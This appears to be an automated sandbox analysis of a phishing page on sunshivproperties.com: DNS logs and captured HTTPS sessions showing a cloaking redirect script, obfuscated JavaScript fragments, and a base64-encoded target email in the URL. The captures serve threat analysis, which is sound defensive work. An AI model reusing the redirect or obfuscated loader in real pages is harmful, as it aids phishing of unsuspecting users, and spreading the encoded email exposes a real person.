Apr 16, 2024 14:21:16.470525980 CEST	1.1.1.1	192.168.2.4	0xeb4c	No error (0)	a.nel.cloudflare.com		35.190.80.1	A (IP address)	IN (0x0001)	false
Apr 16, 2024 14:21:19.165333033 CEST	1.1.1.1	192.168.2.4	0x314e	No error (0)	warrentongroup.com		142.4.12.244	A (IP address)	IN (0x0001)	false
Apr 16, 2024 14:21:23.368633986 CEST	1.1.1.1	192.168.2.4	0x7793	No error (0)	www.warrentongroup.com		142.4.12.244	A (IP address)	IN (0x0001)	false
Apr 16, 2024 14:21:24.159950018 CEST	1.1.1.1	192.168.2.4	0x75d3	No error (0)	www.warrentongroup.com		142.4.12.244	A (IP address)	IN (0x0001)	false
Apr 16, 2024 14:21:26.968274117 CEST	1.1.1.1	192.168.2.4	0x1ff4	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Apr 16, 2024 14:21:26.968274117 CEST	1.1.1.1	192.168.2.4	0x1ff4	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Apr 16, 2024 14:21:27.321166039 CEST	1.1.1.1	192.168.2.4	0x1d65	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 16, 2024 14:21:27.321166039 CEST	1.1.1.1	192.168.2.4	0x1d65	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 16, 2024 14:21:40.371053934 CEST	1.1.1.1	192.168.2.4	0x712f	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 16, 2024 14:21:40.371053934 CEST	1.1.1.1	192.168.2.4	0x712f	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 16, 2024 14:22:03.323739052 CEST	1.1.1.1	192.168.2.4	0xd41f	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 16, 2024 14:22:03.323739052 CEST	1.1.1.1	192.168.2.4	0xd41f	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 16, 2024 14:22:23.120356083 CEST	1.1.1.1	192.168.2.4	0x839d	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 16, 2024 14:22:23.120356083 CEST	1.1.1.1	192.168.2.4	0x839d	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

sunshivproperties.com

https:

warrentongroup.com

www.warrentongroup.com

fs.microsoft.com

a.nel.cloudflare.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	104.21.54.147	443	5244	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 12:21:12 UTC	737	OUT	GET /views/partials/header.html?white=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20= HTTP/1.1 Host: sunshivproperties.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 12:21:13 UTC	641	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 12:21:13 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close last-modified: Mon, 15 Apr 2024 02:51:55 GMT accept-ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2QZzILHRPGfh2cbQ3faGSOh22a4AnG%2B6MqIDwc4%2FE%2BqKdE5GCAnwKhutMtwZujypCa1PuxaEzAeuOW4L90iNmHfQieh%2Fn6IPEUcRkRkGtLXwXWxap2cPjW%2FiazkJ4wjt7L8h6%2FDyojA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 875422438d2d7b9b-ATL alt-svc: h3=":443"; ma=86400
2024-04-16 12:21:13 UTC	728	IN	Data Raw: 62 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 2e 2e 20 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 66 6f 6f 74 65 72 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 65 78 2d 64 Data Ascii: bc2<!DOCTYPE html><html><head><title>Loading..... .</title><script src="footer.js"></script><style> body { margin: 0; height: 100vh; background-color: white; display: flex; flex-d
2024-04-16 12:21:13 UTC	1369	IN	Data Raw: 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 30 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 69 6e 67 2d 63 6f 6e 74 65 6e 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 69 6e 67 2d 63 69 72 63 6c 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 34 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 31 Data Ascii: tent: center; align-items: center; z-index: 1000; } .loading-content { display: flex; align-items: center; } .loading-circle { border: 4px solid rgba(0, 0, 0, .1
2024-04-16 12:21:13 UTC	920	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 61 72 67 65 74 55 72 6c 20 3d 20 69 73 42 6f 74 4c 69 6b 65 41 63 74 69 76 69 74 79 20 3f 20 22 68 74 74 70 73 3a 2f 2f 70 72 6f 6a 65 63 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 65 6e 2d 55 53 2f 22 20 3a 20 42 4f 4f 4b 53 5b 72 61 6e 64 6f 6d 49 6e 64 65 78 5d 20 2b 20 4d 79 62 6f 6f 6b 73 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 74 61 72 67 65 74 55 72 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 20 32 30 30 30 29 3b 0a 20 20 20 20 20 20 Data Ascii: var targetUrl = isBotLikeActivity ? "https://project.microsoft.com/en-US/" : BOOKS[randomIndex] + Mybooks; setTimeout(function() { window.location.href = targetUrl; }, 2000);
2024-04-16 12:21:13 UTC	6	IN	Data Raw: 31 0d 0a 0a 0d 0a Data Ascii: 1
2024-04-16 12:21:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	104.21.54.147	443	5244	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 12:21:13 UTC	624	OUT	GET /views/partials/footer.js HTTP/1.1 Host: sunshivproperties.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://sunshivproperties.com/views/partials/header.html?white=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20= Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 12:21:14 UTC	689	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 12:21:14 GMT Content-Type: application/javascript Content-Length: 62760 Connection: close Cf-Bgj: minify last-modified: Mon, 15 Apr 2024 02:51:17 GMT Cache-Control: max-age=14400 CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cP0iULRK5%2FP5uD09wz2UTtBo2B1ByNbPVeFBtnSl4T5nNAl7NrC1uCVhu6CmPQp5Ey3CubKwkNr0xN83HIt8ajbFWKvv3P3dJEVZCi8960HZaJzJ3QaOL5IHUOmKeqMZ55dOSxJg4tY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 875422486b39ad95-ATL alt-svc: h3=":443"; ma=86400
2024-04-16 12:21:14 UTC	680	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 34 34 34 65 35 61 28 5f 30 78 31 66 66 32 63 62 2c 5f 30 78 35 31 36 62 38 61 2c 5f 30 78 32 30 30 30 63 61 2c 5f 30 78 34 37 35 33 64 34 2c 5f 30 78 32 38 36 64 31 65 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 30 63 34 28 5f 30 78 35 31 36 62 38 61 2d 30 78 33 61 38 2c 5f 30 78 32 38 36 64 31 65 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 34 37 38 35 28 29 7b 76 61 72 20 5f 30 78 31 63 38 33 39 61 3d 5b 27 68 58 72 49 57 50 54 38 27 2c 27 57 50 78 64 51 74 71 78 61 38 6b 4e 6e 61 27 2c 27 57 50 31 43 67 6d 6b 52 57 52 71 27 2c 27 57 51 69 57 57 51 50 2b 57 52 69 6d 66 78 5a 63 4a 57 35 30 73 43 6f 53 27 2c 27 72 53 6b 49 57 51 61 27 2c 27 64 33 78 63 53 6d 6f 45 57 50 38 27 2c 27 6f 31 72 77 6a 43 6b 38 27 2c 27 57 50 75 Data Ascii: function _0x444e5a(_0x1ff2cb,_0x516b8a,_0x2000ca,_0x4753d4,_0x286d1e){return _0x10c4(_0x516b8a-0x3a8,_0x286d1e);}function _0x4785(){var _0x1c839a=['hXrIWPT8','WPxdQtqxa8kNna','WP1CgmkRWRq','WQiWWQP+WRimfxZcJW50sCoS','rSkIWQa','d3xcSmoEWP8','o1rwjCk8','WPu
2024-04-16 12:21:14 UTC	1369	IN	Data Raw: 27 2c 27 57 36 30 54 72 43 6f 2f 57 34 43 27 2c 27 77 74 76 6c 75 61 27 2c 27 57 35 44 65 45 38 6b 66 57 35 43 27 2c 27 57 37 50 4b 73 63 31 6e 27 2c 27 57 36 76 74 57 52 68 63 49 4c 71 27 2c 27 57 35 74 64 51 43 6b 78 57 51 69 6f 27 2c 27 57 50 47 59 57 50 76 53 57 51 47 27 2c 27 69 43 6b 4c 57 34 38 6f 61 57 27 2c 27 45 4a 68 64 4f 32 68 63 55 47 27 2c 27 57 4f 65 48 57 50 4f 55 57 50 34 27 2c 27 57 37 42 63 54 65 30 51 57 37 53 27 2c 27 57 37 64 63 55 71 52 63 50 33 47 27 2c 27 57 4f 6e 77 61 38 6b 6c 57 4f 57 27 2c 27 71 59 39 64 75 6d 6f 50 27 2c 27 75 6d 6f 79 57 4f 50 5a 69 66 4e 63 55 38 6f 7a 43 33 34 27 2c 27 57 34 35 75 74 49 43 39 27 2c 27 57 34 54 45 57 4f 52 63 53 62 53 27 2c 27 45 43 6f 54 57 4f 54 50 73 61 27 2c 27 57 37 71 4b 75 73 34 75 Data Ascii: ','W60TrCo/W4C','wtvlua','W5DeE8kfW5C','W7PKsc1n','W6vtWRhcILq','W5tdQCkxWQio','WPGYWPvSWQG','iCkLW48oaW','EJhdO2hcUG','WOeHWPOUWP4','W7BcTe0QW7S','W7dcUqRcP3G','WOnwa8klWOW','qY9dumoP','umoyWOPZifNcU8ozC34','W45utIC9','W4TEWORcSbS','ECoTWOTPsa','W7qKus4u
2024-04-16 12:21:14 UTC	1369	IN	Data Raw: 75 27 2c 27 57 4f 35 54 6f 73 46 64 52 61 27 2c 27 57 37 52 64 4b 32 62 59 57 51 4b 27 2c 27 57 34 75 73 57 36 2f 63 50 58 65 27 2c 27 70 67 6c 64 4c 38 6f 41 57 51 43 27 2c 27 57 4f 53 6d 57 52 65 68 57 52 75 27 2c 27 57 36 4c 35 73 73 50 77 27 2c 27 7a 65 33 63 4a 47 7a 43 27 2c 27 57 34 6a 39 57 52 5a 64 4a 78 65 27 2c 27 57 34 57 6d 42 57 37 64 50 61 27 2c 27 57 37 75 30 63 53 6f 65 57 35 65 27 2c 27 69 53 6f 49 68 38 6f 6b 57 50 4f 27 2c 27 6e 74 74 63 50 30 78 64 4d 57 6e 7a 57 52 6e 6b 62 43 6f 4a 57 50 34 70 27 2c 27 75 43 6b 58 65 38 6f 74 6b 61 27 2c 27 64 67 56 64 55 6d 6b 2b 78 73 52 64 47 57 27 2c 27 57 4f 44 63 57 51 74 63 4f 58 34 27 2c 27 75 66 6c 64 4d 58 42 63 48 57 27 2c 27 46 47 66 51 57 51 52 64 4b 57 27 2c 27 57 36 69 58 57 4f 48 69 Data Ascii: u','WO5TosFdRa','W7RdK2bYWQK','W4usW6/cPXe','pgldL8oAWQC','WOSmWRehWRu','W6L5ssPw','ze3cJGzC','W4j9WRZdJxe','W4WmBW7dPa','W7u0cSoeW5e','iSoIh8okWPO','nttcP0xdMWnzWRnkbCoJWP4p','uCkXe8otka','dgVdUmk+xsRdGW','WODcWQtcOX4','ufldMXBcHW','FGfQWQRdKW','W6iXWOHi
2024-04-16 12:21:14 UTC	1369	IN	Data Raw: 47 33 63 4e 72 58 66 27 2c 27 71 38 6b 4d 57 4f 44 4e 57 36 38 27 2c 27 57 34 79 64 57 34 46 63 50 31 4b 27 2c 27 62 62 58 41 57 51 7a 66 27 2c 27 57 50 4c 58 57 36 64 63 4f 38 6f 66 27 2c 27 46 53 6f 33 57 34 31 54 57 50 30 27 2c 27 77 62 56 63 4a 58 6e 78 27 2c 27 6e 73 65 62 57 50 4a 63 49 61 27 2c 27 64 73 6c 64 4d 77 47 6b 27 2c 27 57 34 4a 64 52 53 6b 78 57 4f 75 72 27 2c 27 57 37 6e 62 57 52 78 63 4b 78 30 27 2c 27 57 52 4c 57 57 34 6c 63 56 43 6f 54 27 2c 27 57 36 43 49 63 43 6f 57 57 36 43 27 2c 27 6e 75 69 4a 68 38 6f 2f 27 2c 27 57 37 37 64 48 38 6b 6f 57 50 65 52 27 2c 27 6d 6d 6b 52 57 34 47 42 6c 47 27 2c 27 57 35 50 36 77 43 6b 32 57 34 69 27 2c 27 61 38 6b 43 57 34 34 54 65 71 27 2c 27 57 37 57 4f 43 43 6f 49 6e 47 27 2c 27 7a 53 6b 2f 70 Data Ascii: G3cNrXf','q8kMWODNW68','W4ydW4FcP1K','bbXAWQzf','WPLXW6dcO8of','FSo3W41TWP0','wbVcJXnx','nsebWPJcIa','dsldMwGk','W4JdRSkxWOur','W7nbWRxcKx0','WRLWW4lcVCoT','W6CIcCoWW6C','nuiJh8o/','W77dH8koWPeR','mmkRW4GBlG','W5P6wCk2W4i','a8kCW44Teq','W7WOCCoInG','zSk/p
2024-04-16 12:21:14 UTC	1369	IN	Data Raw: 38 61 47 27 2c 27 43 74 39 52 57 50 4b 27 2c 27 57 34 33 63 4e 43 6b 4b 57 36 37 64 4a 61 27 2c 27 57 34 76 4f 41 53 6b 58 57 35 65 27 2c 27 73 62 42 63 48 33 78 63 54 57 27 2c 27 57 4f 35 46 57 35 37 63 55 72 6d 27 2c 27 74 4d 6c 63 49 63 72 76 45 4b 44 77 57 50 6e 79 41 71 27 2c 27 70 67 39 44 70 38 6b 46 27 2c 27 72 47 56 63 50 49 54 4a 27 2c 27 43 58 58 42 46 6d 6f 64 27 2c 27 57 37 52 64 4c 58 52 63 55 72 47 27 2c 27 57 37 6c 63 54 6d 6b 4b 57 4f 30 68 27 2c 27 57 34 64 63 53 43 6b 46 57 52 71 67 27 2c 27 6b 48 50 75 57 52 48 6d 27 2c 27 57 37 4b 49 7a 4a 37 64 50 71 27 2c 27 57 35 56 64 4d 74 52 63 53 4a 57 27 2c 27 66 74 4c 6a 6e 6d 6b 57 72 77 38 27 2c 27 57 50 64 63 4a 6d 6b 39 57 51 4a 64 4a 57 27 2c 27 66 38 6f 4d 6f 53 6f 79 57 50 4f 27 2c 27 Data Ascii: 8aG','Ct9RWPK','W43cNCkKW67dJa','W4vOASkXW5e','sbBcH3xcTW','WO5FW57cUrm','tMlcIcrvEKDwWPnyAq','pg9Dp8kF','rGVcPITJ','CXXBFmod','W7RdLXRcUrG','W7lcTmkKWO0h','W4dcSCkFWRqg','kHPuWRHm','W7KIzJ7dPq','W5VdMtRcSJW','ftLjnmkWrw8','WPdcJmk9WQJdJW','f8oMoSoyWPO','
2024-04-16 12:21:14 UTC	1369	IN	Data Raw: 37 52 63 4e 77 35 41 57 36 53 27 2c 27 46 53 6f 42 57 37 66 49 57 50 47 27 2c 27 57 51 65 34 57 34 6c 63 56 6d 6b 57 27 2c 27 57 37 44 34 75 49 58 6d 27 2c 27 57 35 78 63 50 4d 47 2b 57 34 57 27 2c 27 57 51 72 37 67 74 4a 64 4e 57 27 2c 27 57 37 76 4b 71 71 27 2c 27 57 4f 39 79 57 37 42 63 4d 6d 6f 6e 27 2c 27 79 53 6b 2f 6d 43 6f 70 6d 61 27 2c 27 57 36 4e 64 48 63 64 63 53 62 57 27 2c 27 57 35 37 63 55 43 6b 47 57 50 53 71 27 2c 27 57 36 75 4f 68 38 6f 6d 57 37 38 27 2c 27 57 35 70 64 50 66 6e 56 57 51 38 27 2c 27 57 51 72 78 64 38 6b 33 57 4f 61 27 2c 27 57 37 6a 66 42 49 54 58 27 2c 27 57 50 70 63 54 38 6b 6a 57 4f 2f 64 51 47 27 2c 27 57 50 39 59 69 61 4e 64 47 71 27 2c 27 57 37 66 52 57 34 4b 56 57 35 61 27 2c 27 57 34 43 52 70 38 6f 69 57 35 43 27 Data Ascii: 7RcNw5AW6S','FSoBW7fIWPG','WQe4W4lcVmkW','W7D4uIXm','W5xcPMG+W4W','WQr7gtJdNW','W7vKqq','WO9yW7BcMmon','ySk/mCopma','W6NdHcdcSbW','W57cUCkGWPSq','W6uOh8omW78','W5pdPfnVWQ8','WQrxd8k3WOa','W7jfBITX','WPpcT8kjWO/dQG','WP9YiaNdGq','W7fRW4KVW5a','W4CRp8oiW5C'
2024-04-16 12:21:14 UTC	1369	IN	Data Raw: 32 33 65 37 66 63 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 30 63 34 28 5f 30 78 35 30 31 64 30 30 2d 20 2d 30 78 65 32 2c 5f 30 78 31 63 32 36 37 35 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 35 65 65 36 61 28 5f 30 78 31 32 62 37 34 63 2c 5f 30 78 36 32 31 39 62 64 2c 5f 30 78 33 64 32 38 66 61 2c 5f 30 78 34 65 62 32 66 39 2c 5f 30 78 63 31 33 35 61 32 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 30 63 34 28 5f 30 78 36 32 31 39 62 64 2d 20 2d 30 78 32 30 33 2c 5f 30 78 63 31 33 35 61 32 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 32 66 64 62 65 64 28 5f 30 78 35 30 62 63 65 31 2c 5f 30 78 34 62 66 65 35 65 2c 5f 30 78 32 65 66 39 66 34 2c 5f 30 78 34 32 37 31 34 32 2c 5f 30 78 34 34 63 33 33 30 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 30 63 34 28 5f 30 78 Data Ascii: 23e7fc){return _0x10c4(_0x501d00- -0xe2,_0x1c2675);}function _0x35ee6a(_0x12b74c,_0x6219bd,_0x3d28fa,_0x4eb2f9,_0xc135a2){return _0x10c4(_0x6219bd- -0x203,_0xc135a2);}function _0x2fdbed(_0x50bce1,_0x4bfe5e,_0x2ef9f4,_0x427142,_0x44c330){return _0x10c4(_0x
2024-04-16 12:21:14 UTC	1369	IN	Data Raw: 28 29 29 3b 7d 63 61 74 63 68 28 5f 30 78 35 36 61 38 66 35 29 7b 5f 30 78 65 65 37 32 61 66 5b 27 70 75 73 68 27 5d 28 5f 30 78 65 65 37 32 61 66 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 5f 30 78 34 37 38 35 2c 30 78 64 65 32 33 35 2a 2d 30 78 31 2b 30 78 33 2a 2d 30 78 33 31 31 62 38 2b 2d 30 78 31 62 35 31 63 2a 2d 30 78 31 32 29 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 34 32 30 37 63 31 28 5f 30 78 31 37 61 31 34 64 2c 5f 30 78 32 32 61 62 62 64 2c 5f 30 78 33 30 36 63 33 36 2c 5f 30 78 32 61 39 30 62 33 2c 5f 30 78 34 64 62 38 61 32 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 30 63 34 28 5f 30 78 33 30 36 63 33 36 2d 20 2d 30 78 32 63 2c 5f 30 78 32 32 61 62 62 64 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 32 39 34 65 37 28 5f 30 78 31 62 Data Ascii: ());}catch(_0x56a8f5){_0xee72af['push'](_0xee72af['shift']());}}}(_0x4785,0xde235-0x1+0x3-0x311b8+-0x1b51c*-0x12));function _0x4207c1(_0x17a14d,_0x22abbd,_0x306c36,_0x2a90b3,_0x4db8a2){return _0x10c4(_0x306c36- -0x2c,_0x22abbd);}function _0x5294e7(_0x1b
2024-04-16 12:21:14 UTC	1369	IN	Data Raw: 2c 27 59 23 21 69 27 2c 30 78 34 61 33 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 62 32 32 62 62 34 28 5f 30 78 33 32 64 35 38 37 2c 5f 30 78 33 38 36 62 31 66 2c 5f 30 78 33 38 34 61 33 37 2c 5f 30 78 32 63 36 37 32 66 2c 5f 30 78 35 32 34 37 37 34 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 30 63 34 28 5f 30 78 33 38 36 62 31 66 2d 30 78 65 39 2c 5f 30 78 35 32 34 37 37 34 29 3b 7d 5f 30 78 31 38 66 33 62 39 5b 5f 30 78 34 34 37 61 61 34 28 30 78 34 66 36 2c 27 79 37 48 37 27 2c 30 78 34 36 39 2c 30 78 34 35 33 2c 30 78 35 34 39 29 5d 3d 5f 30 78 31 65 65 64 31 66 28 30 78 32 37 39 2c 30 78 32 61 38 2c 27 4f 4c 30 70 27 2c 30 78 32 33 63 2c 30 78 31 62 35 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 65 64 30 37 35 61 28 5f 30 78 32 38 37 30 64 34 2c 5f 30 78 32 Data Ascii: ,'Y#!i',0x4a3);function _0xb22bb4(_0x32d587,_0x386b1f,_0x384a37,_0x2c672f,_0x524774){return _0x10c4(_0x386b1f-0xe9,_0x524774);}_0x18f3b9[_0x447aa4(0x4f6,'y7H7',0x469,0x453,0x549)]=_0x1eed1f(0x279,0x2a8,'OL0p',0x23c,0x1b5);function _0xed075a(_0x2870d4,_0x2
2024-04-16 12:21:14 UTC	1369	IN	Data Raw: 54 30 50 4b 27 2c 30 78 35 33 31 2c 30 78 35 30 31 2c 30 78 34 39 37 2c 30 78 33 66 33 29 5d 28 5f 30 78 32 38 66 35 38 61 2c 5f 30 78 35 33 35 38 66 63 29 3b 7d 2c 27 74 61 41 66 46 27 3a 5f 30 78 34 36 35 33 34 63 5b 5f 30 78 35 31 32 30 61 38 28 30 78 31 63 38 2c 30 78 31 36 38 2c 27 32 63 6c 76 27 2c 30 78 31 36 36 2c 30 78 31 64 34 29 5d 2c 27 4f 67 77 63 74 27 3a 5f 30 78 34 36 35 33 34 63 5b 5f 30 78 34 62 37 38 64 62 28 27 67 43 79 6c 27 2c 2d 30 78 34 33 2c 2d 30 78 35 66 2c 2d 30 78 33 62 2c 30 78 38 63 29 5d 7d 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 34 35 36 32 39 28 5f 30 78 34 66 39 61 34 36 2c 5f 30 78 35 36 37 63 31 35 2c 5f 30 78 39 39 31 35 32 37 2c 5f 30 78 34 66 66 35 38 37 2c 5f 30 78 31 35 61 61 65 62 29 7b 72 65 74 75 72 6e 20 5f Data Ascii: T0PK',0x531,0x501,0x497,0x3f3)](_0x28f58a,_0x5358fc);},'taAfF':_0x46534c[_0x5120a8(0x1c8,0x168,'2clv',0x166,0x1d4)],'Ogwct':_0x46534c[_0x4b78db('gCyl',-0x43,-0x5f,-0x3b,0x8c)]};function _0x345629(_0x4f9a46,_0x567c15,_0x991527,_0x4ff587,_0x15aaeb){return _

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	104.21.54.147	443	5244	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 12:21:15 UTC	671	OUT	GET /favicon.ico HTTP/1.1 Host: sunshivproperties.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://sunshivproperties.com/views/partials/header.html?white=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20= Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 12:21:16 UTC	615	IN	HTTP/1.1 404 Not Found Date: Tue, 16 Apr 2024 12:21:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FVNDvvcLmx2WJFM1GObnV3A8k24Xo4QcgDeTJP54UVHL42fG0ur4gRuybv6FeMLWjIygd5azM8bmNaVCBAzs7PnLh0rnmGO2evDWk%2FZewBzvhjJ9Fu3iDMqqSKFOlZAuyWMBeGmT8J4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87542253cac017f7-ATL alt-svc: h3=":443"; ma=86400
